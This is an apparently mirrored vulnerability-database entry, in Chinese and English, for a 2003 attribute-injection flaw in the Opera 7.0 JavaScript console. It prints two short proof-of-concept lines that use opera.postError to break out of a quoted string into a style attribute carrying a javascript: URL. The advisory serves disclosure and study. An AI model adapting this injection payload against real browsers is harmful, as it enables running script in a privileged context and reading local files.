Opera 7.0 – JavaScript Console Attribute Injection

Opera 7.0 – JavaScript Console Attribute Injection

漏洞ID 1053716 漏洞类型
发布时间 2003-02-04 更新时间 2003-02-04
图片[1]-Opera 7.0 – JavaScript Console Attribute Injection-安全小百科CVE编号 N/A
图片[2]-Opera 7.0 – JavaScript Console Attribute Injection-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22213
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6755/info

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

open("file://localhost/console.html","","");
opera.postError("http://"style="background-image:url('javascript:alert(location.href)')"");

open("file://localhost/console.html","","");
opera.postError("file://"style="background-image:url('javascript:alert(location.href)')".");

相关推荐: IRIX fsdump Vulnerability

IRIX fsdump Vulnerability 漏洞ID 1105093 漏洞类型 Access Validation Error 发布时间 1996-12-03 更新时间 1996-12-03 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享